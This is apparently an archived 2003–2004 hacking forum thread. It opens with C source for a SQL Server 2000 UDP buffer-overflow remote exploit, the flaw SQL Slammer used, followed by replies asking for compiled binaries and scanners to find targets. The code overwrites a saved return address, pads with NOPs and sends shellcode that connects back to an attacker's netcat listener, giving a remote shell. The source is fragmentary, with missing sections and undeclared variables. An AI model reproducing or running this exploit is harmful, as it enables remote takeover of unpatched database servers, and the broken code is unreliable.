int main(int argc, char *argv[]) { unsigned int ErrorLevel=0; int count = 0; char sc[300]=""; char ipaddress[40]=""; unsigned short port = 0; unsigned int ip = 0; char *ipt=""; char buffer[400]=""; unsigned short prt=0; char *prtt="";
if(argc != 2 && argc != 5) { printf("===============================================================rn"); printf("SQL Server UDP Buffer Overflow Remote Exploitrnn"); printf("Modified from "Advanced Windows Shellcode"rn"); printf("Code by David Litchfield, david@ngssoftware.comrn"); printf("Modified by lion, fix a bug.rn"); printf("Welcome to HUC Website http://www.cnhonker.comrnn"); printf("Usage:rn"); printf(" %s Target [<NCHost> <NCPort> <SQLSP>]rnn", argv[0]); printf("Exemple:rn"); printf(" C:\>nc -l -p 53rn"); printf("Target is MSSQL SP 0:rn"); printf(" C:\>%s 192.168.0.1 192.168.7.1 53 0rn",argv[0]); printf("Target is MSSQL SP 1 or 2:rn"); printf(" c:\>%s 192.168.0.1 192.168.7.1 53 1rnn", argv[0]); return 0; }
strncpy(host, argv[1], 100);
strncpy(ipaddress, argv[2], 36);
port = atoi(argv[3]);
// SQL Server 2000 Service pack level // The import entry for GetProcAddress in sqlsort.dll // is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C // Need to set the last byte accordingly
// set this IP address to connect back to // this should be your address ip = inet_addr(ipaddress); ipt = (char*)&ip; buffer[142]=ipt[0]; buffer[143]=ipt[1]; buffer[144]=ipt[2]; buffer[145]=ipt[3];
// set the TCP port to connect on // netcat should be listening on this port // e.g. nc -l -p 80
// Overwrite the saved return address on the stack // This address contains a jmp esp instruction // and is in sqlsort.dll.
strcat(request,"xDCxC9xB0x42"); // 0x42B0C9DC
// Need to do a near jump strcat(request,"xEBx0Ex41x42x43x44x45x46");
// Need to set an address which is writable or // sql server will crash before we can exploit // the overrun. Rather than choosing an address // on the stack which could be anywhere we'll // use an address in the .data segment of sqlsort.dll // as we're already using sqlsort for the saved // return address
// SQL 2000 no service packs needs the address here strcat(request,"x01x70xAEx42");
// SQL 2000 Service Pack 2 needs the address here strcat(request,"x01x70xAEx42");
// just a few nops strcat(request,"x90x90x90x90x90x90x90x90");
len = strlen(request)+ explen;
// tack on exploit code to the end of our request and fire it off memcpy(request+strlen(request), buffer, explen);
// printf("Size: %d/%drn", len, strlen(request));
GainControlOfSQL();
return 0; }
int StartWinsock() { int err=0; WORD wVersionRequested; WSADATA wsaData;
printf("Packet sent!rn"); printf("If you don't have a shell it didn't work.rn"); rcv = recv(s,resp,596,0); if(rcv > 1) { while(count < rcv) { if(resp[count]==0x00) resp[count]=0x20; count++; } printf("%s",resp); } } closesocket(s);
return 0; }
* i know its bit long for this page but.. its good exploit and i tought i should share it. *
groove-monkey
Aug 19 2003, 07:31 PM
can someone compile this and post? It would be greatly appreciated.
Im about to do a search for scanners and any tutes that might be available for this sploit. But if anyone already has one available it would be just swell if you let us know. Ill post my findings once I see ones that are worth it to post.
FL4Me
Aug 19 2003, 07:45 PM
ok - i will compile & upload it.. ( i will edit this msg after ill compile&upload - and ill add a link )
larsbruggie
Aug 19 2003, 09:49 PM
that would be great
jurk-off
Aug 19 2003, 10:05 PM
omg very good job m8!!! ill go on scanner research
I believe this bug is old, it's from july 2002 if i'm not mistaking, tho, i compiled it, and putted it into the download section. good luck wiht it, let me know if it works..
Greetings, woutiir
shaun2k2
Aug 20 2003, 03:30 PM
Next time, when posting exploit codes, will you please at least post a link to the advisory, instead of simply posting the exploit. This makes sure that people absorb the technical details of the vulnerability, instead of just attempting to crack other peoples computers.
Jurk-off did the right thing by providing vulnerability information. Cheers .
Thank you for your time. Shaun.
will_do
Aug 20 2003, 03:37 PM
Can anybody tell me how to scan this and with which scantool?
greatly appreciated
SoleKiller
Aug 20 2003, 07:56 PM
thank you vewy much
bratt
Aug 20 2003, 08:24 PM
old released : Jan 29 2003 need a scanner
TheCommiser
Aug 20 2003, 09:45 PM
is this the exploit slammer ran on??
SyN/AcK
Jan 18 2004, 10:43 AM
Thanks for this guys... and yes this is the one that sql slammer used.
INVASION
Jan 18 2004, 02:16 PM
somebody has a tutorial or what to learn how to compile this?
SyN/AcK
Jan 18 2004, 06:51 PM
Simple, just load up Visual Studio and compile it.
I believe this exploits port 1434 over UDP protocol. Its the same exploit that SQL SLammer used.
cyrixx
Jan 18 2004, 07:04 PM
yooooo, and is now useless i don't think that somebody will find any targets
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
.
i don't think that somebody will find any targets 
